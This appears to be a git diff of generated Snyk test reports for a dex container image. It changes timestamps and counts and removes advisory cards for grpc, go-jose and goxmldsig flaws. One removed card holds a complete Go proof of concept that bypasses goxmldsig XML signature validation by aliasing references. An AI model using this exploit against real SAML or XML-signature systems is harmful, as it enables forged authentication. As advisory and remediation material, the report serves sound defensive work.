@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:45:22 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:35:58 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

File diff suppressed because it is too large Load Diff

View File

@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="49 known vulnerabilities found in 146 vulnerable dependency paths.">
<meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:40:17 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:33:53 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>49</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>146 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1134</span> <span>dependencies</span></div>
<div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>141 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1131</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -515,89 +515,6 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--critical">
<span class="label__text">critical severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.68.1
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.72.1
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">CVE-2025-69421</h2>
<div class="card__section">
@@ -1138,193 +1055,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Proof of Concept</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow"></span> /usr/local/bin/dex
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/russellhaering/goxmldsig
</li>
<li class="card__meta__item">Introduced through:
github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/russellhaering/goxmldsig@v1.5.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
<p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
<h2 id="poc">PoC</h2>
<pre><code>package main
import (
&quot;crypto/rand&quot;
&quot;crypto/rsa&quot;
&quot;crypto/tls&quot;
&quot;crypto/x509&quot;
&quot;encoding/base64&quot;
&quot;fmt&quot;
&quot;math/big&quot;
&quot;time&quot;
&quot;github.com/beevik/etree&quot;
dsig &quot;github.com/russellhaering/goxmldsig&quot;
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &amp;x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement(&quot;Root&quot;)
root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
root.SetText(&quot;Malicious Content&quot;)
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
originalEl := etree.NewElement(&quot;Root&quot;)
originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
originalEl.SetText(&quot;Original Content&quot;)
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println(&quot;c14n error:&quot;, err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &amp;dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println(&quot;XML:&quot;)
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println(&quot;validation failed:&quot;, err)
} else {
fmt.Println(&quot;validation ok&quot;)
fmt.Println(&quot;validated text:&quot;, validated.Text())
}
}
</code></pre>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
@@ -1399,92 +1129,6 @@
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOLANGJWTJWTV5-9510922">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--high" data-snyk-test="high">
<h2 class="card__title">Uncaught Exception</h2>
<div class="card__section">
<div class="card__labels">
<div class="label label--high">
<span class="label__text">high severity</span>
</div>
<div class="label label--exploit">
<span class="label__text">Exploit: Not Defined</span>
</div>
</div>
<hr/>
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
</li>
<li class="card__meta__item">
Vulnerable module:
github.com/go-jose/go-jose/v4
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v4@* and github.com/go-jose/go-jose/v4@v4.0.2
</li>
</ul>
<hr/>
<h3 class="card__section__title">Detailed paths</h3>
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v4@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.0.2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
<span class="list-paths__item__arrow"></span>
github.com/go-jose/go-jose/v4@v4.1.0
</span>
</li>
</ul><!-- .list-paths -->
</div><!-- .card__section -->
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Uncaught Exception in the <code>cipher.KeyUnwrap</code> function when decrypting a JSON Web Encryption (JWE) object with a key wrapping algorithm (ending in &#39;KW&#39;, except for &#39;A128GCMKW&#39;, &#39;A192GCMKW&#39;, and &#39;A256GCMKW&#39;) and the <code>encrypted_key</code> field is empty. An attacker can cause a panic and disrupt service by submitting a crafted JWE object with an empty <code>encrypted_key</code> field or by directly invoking <code>cipher.KeyUnwrap</code> with a ciphertext parameter less than 16 bytes long.</p>
<p><strong>Note:</strong></p>
<p>This is only exploitable if the list of accepted key algorithms includes key wrapping algorithms.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by prevalidating JWE objects to ensure the <code>encrypted_key</code> field is nonempty, or by excluding key wrapping algorithms from the list of accepted key algorithms.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>github.com/go-jose/go-jose/v4</code> to version 4.1.4 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8">GitHub Advisory</a></li>
<li><a href="https://github.com/go-jose/go-jose/commit/0e59876635f3dbf46d7b5e97b52bb75a3f96e7d9">GitHub Commit</a></li>
</ul>
<hr/>
<div class="cta card__cta">
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV4-15875221">More about this vulnerability</a></p>
</div>
</div><!-- .card -->
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
<h2 class="card__title">Inefficient Algorithmic Complexity</h2>

View File

@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:46:02 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:33:58 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>

Some files were not shown because too many files have changed in this diff Show More